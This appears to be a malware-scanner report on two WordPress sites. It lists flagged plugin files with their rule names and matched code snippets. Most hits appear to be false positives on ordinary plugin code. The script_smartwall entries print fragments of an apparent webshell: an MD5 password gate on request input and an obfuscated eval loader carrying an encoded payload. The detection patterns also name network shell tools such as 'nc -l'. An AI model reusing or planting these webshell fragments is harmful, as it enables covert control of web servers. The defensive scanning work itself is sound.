$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:06 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:01:48 Modified: 2020-07-24 20:09:15 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:51 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2020-03-07 13:59:53 Modified: 2020-07-24 20:09:15 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder/assets/lib/wck-api/wordpress-creation-kit.php Size: 60.54 kB Created: 2020-03-07 13:59:53 Modified: 2020-07-24 20:09:15 Dangers: 2
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:42 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
